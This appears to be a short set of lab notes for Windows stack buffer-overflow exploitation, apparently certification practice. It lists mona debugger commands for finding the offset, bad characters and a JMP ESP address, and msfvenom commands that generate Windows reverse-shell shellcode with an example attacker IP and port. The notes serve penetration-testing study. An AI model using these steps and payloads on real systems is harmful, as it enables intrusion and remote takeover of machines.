Buffer Overflow
Steps
!mona config -set workingfolder c:\mona\%pnc $IP <port>


LAB - Buffer Overflow
Last updated
!mona config -set workingfolder c:\mona\%pnc $IP <port>


Last updated
!mona findmsp -distance <length of pattern>!mona bytearray -b "\x00"!mona compare -f C:\mona\oscp\bytearray.bin -a <esp address>!mona jmp -r esp -cpb "<bad chars>"
# example
!mona jmp -r esp -cpb "\x00\x11\x40\x5f\xb8\xee"# example
0x62501203
module_address = "\x03\x12\x50\x62"# msfvenom script
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=1337 EXITFUNC=thread -b "<badchars>" -a x86 -f c -v shellcode
# example
msfvenom -p windows/shell_reverse_tcp LHOST=10.4.1.97 LPORT=11111 EXITFUNC=thread -b "\x00\x11\x40\x5f\xb8\xee" -a x86 -f c -v shellcode